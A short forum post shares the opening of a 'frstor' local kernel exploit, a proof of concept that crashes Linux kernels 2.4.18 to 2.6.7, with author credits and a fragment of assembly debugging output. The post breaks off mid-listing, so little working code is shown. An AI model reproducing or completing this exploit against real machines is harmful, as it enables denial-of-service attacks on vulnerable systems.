i dont THINK this has been discussed b4. please remove it if it has.
CODE
/* ----------------------------------------------------------------------------- * frstor Local Kernel exploit * Crashes any kernel from 2.4.18 * to 2.6.7 because frstor in assembler inline offsets in memory by 4. * Original proof of concept code * by stian_@_nixia.no. * Added some stuff by lorenzo_@_gnu.org * and fixed the fsave line with (*fpubuf). * ----------------------------------------------------------------------------- */
/* ----------------------------------------- Some debugging information made available by stian_@_nixia.no ----------------------------------------- TakeDown: pushl %ebp movl %esp, %ebp subl $136, %esp leal -120(%ebp), %eax movl %eax, -124(%ebp) #APP fsave -124(%ebp)